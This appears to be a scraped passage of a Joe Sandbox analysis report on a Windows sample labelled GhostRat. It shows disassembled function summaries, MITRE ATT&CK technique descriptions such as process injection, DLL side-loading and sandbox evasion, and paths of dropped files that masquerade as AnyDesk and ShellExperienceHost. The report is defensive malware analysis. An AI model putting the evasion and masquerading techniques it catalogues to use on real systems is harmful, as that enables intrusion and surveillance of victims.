Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Close$Value
String ID: A
API String ID: 299128501-3554254475
Opcode ID: 6b3d440ca73916d40965945a8ca490dd9b920e5916d48814f7b5630cdf7d6dfb
Instruction ID: 07ec702ed543dc18e3155a081f34dd76072f214d431ba6b90e85ee79bfe4d054
Opcode Fuzzy Hash: 6b3d440ca73916d40965945a8ca490dd9b920e5916d48814f7b5630cdf7d6dfb
Instruction Fuzzy Hash: 65214836600224ABCF158F58D845AEE7BB8EF45364F204059F819DB750EB3ADD42D792

Function 6C9C8667 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON

Download Yara Rule

APIs

GetObjectW.GDI32(00000800,00000018,?), ref: 6C9C867C

Strings

4(@P, xrefs: 6C9C86F5, 6C9C86BB
4(@P, xrefs: 6C9C8674

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Object
String ID: 4(@P$4(@P
API String ID: 2936123098-294022790
Opcode ID: 44b3a3474572351c9b1de2d28ad6bdc01b21bddaeeee41c5ede18a6957dd3425
Instruction ID: 2dd142718cd9ebb21ab31c3f44ee39d898d7b2c145ccd0c6844efecc98e3212b
Opcode Fuzzy Hash: 44b3a3474572351c9b1de2d28ad6bdc01b21bddaeeee41c5ede18a6957dd3425
Instruction Fuzzy Hash: CD216071E00219EFDB10CFA8D884BEEB7B8FF09715F10002AE906B7240D774AA04CB94

Function 6C9DF846 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetMonitorInfoW.USER32(?,?), ref: 6C9DF869
CopyRect.USER32(?,?), ref: 6C9DF87B

Strings

(, xrefs: 6C9DF862

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: CopyInfoMonitorRect
String ID: (
API String ID: 2119610155-3887548279
Opcode ID: 5439af1ff436c7d7ffb2ede61de43340d85345d9a9346995d08e7d32371d2ead
Instruction ID: 17143fa032a6895f93bf7971debd70a7f54acf7ac900121f1f17ee72d4e38bb2
Opcode Fuzzy Hash: 5439af1ff436c7d7ffb2ede61de43340d85345d9a9346995d08e7d32371d2ead
Instruction Fuzzy Hash: D211A271A00709DFDB10DFA9D58499AB7F8FF48705B50882DE4AAE3650E730E945CF50

Function 6CA3C723 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37registrywindowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CA3C72A
RegisterWindowMessageW.USER32(00000010,00000004,6CA3C48F,00000000,00000000,0000005C,6C9E6F1E,?,00000550), ref: 6CA3C774

Strings

ToolbarButton%p, xrefs: 6CA3C762

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: H_prolog3MessageRegisterWindow
String ID: ToolbarButton%p
API String ID: 875023513-899657487
Opcode ID: 21b3de0ea58432d628fc9e2fc70d9821824ee9ac4e72550950d0a075a2e048e7
Instruction ID: c6f750bffd252380fe26a2ed92a5186de89e99e6c08574b9dfd3f36efa6e4816
Opcode Fuzzy Hash: 21b3de0ea58432d628fc9e2fc70d9821824ee9ac4e72550950d0a075a2e048e7
Instruction Fuzzy Hash: F1F06D789001A2DBDF00AB64CC04AEEB378BF1261DF444A46E864E7B80DB38954A8B65

Function 6C9DC927 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CloseThemeData.UXTHEME(?,6CB33490), ref: 6C9DC953
OpenThemeData.UXTHEME(?,REBAR,6CB33490), ref: 6C9DC961

Strings

REBAR, xrefs: 6C9DC959

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: DataTheme$CloseOpen
String ID: REBAR
API String ID: 1809247333-925029515
Opcode ID: 0fe7854589795d87e508f105502074a5b9eba8d7a0230a6cd4a93b5774bd063c
Instruction ID: 95dfa76c0cfdfcc85643d03d97e0b08a68c5725fc03612abe25873185ae22564
Opcode Fuzzy Hash: 0fe7854589795d87e508f105502074a5b9eba8d7a0230a6cd4a93b5774bd063c
Instruction Fuzzy Hash: C2E04835700BD16BD75066319C0464B37A89F11566B029D29A8ABF7900DE30E4458750

Function 6CAF5DC9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 6C9A1DE0: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,6C9CFF05,?,6C9CFF05,00000000), ref: 6C9A1DE5
Part of subcall function 6C9A1DE0: GetLastError.KERNEL32(?,00000000,00000000,6C9CFF05,?,6C9CFF05,00000000), ref: 6C9A1DEF

IsDebuggerPresent.KERNEL32(?,?,?,6C9A1C33), ref: 6CAF5DFC
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,6C9A1C33), ref: 6CAF5E0B

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 6CAF5E06

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-631824599
Opcode ID: 982008c2f33bd6199f48c6f3ad8b71c691b566ef7bc5e49ff8ec5de0298feb90
Instruction ID: 344b4e781564371d832c3672c925dfc50fe127986cb40cec9edcd1a2358fd9f9
Opcode Fuzzy Hash: 982008c2f33bd6199f48c6f3ad8b71c691b566ef7bc5e49ff8ec5de0298feb90
Instruction Fuzzy Hash: E0E092706083C08BDB608F68E44434E7AF0AF09344F008A6CE46AC3B40EBB8D499CBA1

Function 6C9D4C03 Relevance: 5.0, APIs: 4, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CB8DB80,?,?,?,?,6C9D2337,00000010,00000008,6C9D0D22,6C9D0D65,6C9B9048,6C9C66EE,?,6C9CC267,00000004,6C9CCA19), ref: 6C9D4C34
InitializeCriticalSection.KERNEL32(00000000,?,?,?,?,6C9D2337,00000010,00000008,6C9D0D22,6C9D0D65,6C9B9048,6C9C66EE,?,6C9CC267,00000004,6C9CCA19), ref: 6C9D4C4A
LeaveCriticalSection.KERNEL32(6CB8DB80,?,?,?,?,6C9D2337,00000010,00000008,6C9D0D22,6C9D0D65,6C9B9048,6C9C66EE,?,6C9CC267,00000004,6C9CCA19), ref: 6C9D4C58
EnterCriticalSection.KERNEL32(00000000,?,?,?,6C9D2337,00000010,00000008,6C9D0D22,6C9D0D65,6C9B9048,6C9C66EE,?,6C9CC267,00000004,6C9CCA19,00000120), ref: 6C9D4C65

Part of subcall function 6C9D4BDF: InitializeCriticalSection.KERNEL32(6CB8DB80,6C9D4C1D,?,?,6C9D2337,00000010,00000008,6C9D0D22,6C9D0D65,6C9B9048,6C9C66EE,?,6C9CC267,00000004,6C9CCA19,00000120), ref: 6C9D4BF7

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: CriticalSection$EnterInitialize$Leave
String ID:
API String ID: 713024617-0
Opcode ID: 3333406a0e952b9a9275d979db0874e0ae24bcf3e9f58d4c5583a13489980fd3
Instruction ID: 3e89f320420dd874bb9c030c2929bd987bf81fc9c15eb320d54c3e2be719185d
Opcode Fuzzy Hash: 3333406a0e952b9a9275d979db0874e0ae24bcf3e9f58d4c5583a13489980fd3
Instruction Fuzzy Hash: C2F0F673701295ABCF001BB4BC49BADB63CEF6772AF41402BE146A3901DB34E8448D92

Function 6C9D241E Relevance: 5.0, APIs: 4, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CB8D910,?,?,?,?,6C9D241A,00000000,00000004,6C9D0D08,6C9B9048,6C9C66EE,?,6C9CC267,00000004,6C9CCA19,00000120), ref: 6C9D242A
TlsGetValue.KERNEL32(6CB8D8F4,?,?,?,?,6C9D241A,00000000,00000004,6C9D0D08,6C9B9048,6C9C66EE,?,6C9CC267,00000004,6C9CCA19,00000120), ref: 6C9D243E
LeaveCriticalSection.KERNEL32(6CB8D910,?,?,?,?,6C9D241A,00000000,00000004,6C9D0D08,6C9B9048,6C9C66EE,?,6C9CC267,00000004,6C9CCA19,00000120), ref: 6C9D2458
LeaveCriticalSection.KERNEL32(6CB8D910,?,?,?,?,6C9D241A,00000000,00000004,6C9D0D08,6C9B9048,6C9C66EE,?,6C9CC267,00000004,6C9CCA19,00000120), ref: 6C9D2463

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: b322a82575d960c7b61f4dc387105fc9a40026739271a03f83ee3615ed72daf4
Instruction ID: 07e4abba09589bb453353eefbc76654310e2c425f23cb2932e6ac291d30bd68b
Opcode Fuzzy Hash: b322a82575d960c7b61f4dc387105fc9a40026739271a03f83ee3615ed72daf4
Instruction Fuzzy Hash: B9F090B2600E14ABDB109F25D88888AF73CFF257A3306C029EC46B7900CB30FC05CAA0

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
Tactics:	Defense Evasion
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Deletion, File: File Metadata, File: File Modification, Firewall: Firewall Rule Modification, Network Traffic: Network Traffic Content, Process: OS API Execution, Process: Process Creation, Scheduled Job: Scheduled Job Modification, User Account: User Account Authentication, User Account: User Account Deletion, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, Google Workspace, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PKHDJwnF0I.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GhostRat

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Bulete\AnyDesk.exe

C:\Users\Public\Bulete\program\IOVAS

C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

C:\Users\Public\Bulete\program\yyzyBase.dll

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\PolicyManagement.xml

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a30jm2lq.hke.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cglf4nm4.edd.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ldy04dia.oy0.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o2fhrn4v.3tc.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qcyqvwi1.23u.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qtkbxrq3.ehm.ps1

Windows Analysis Report
PKHDJwnF0I.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

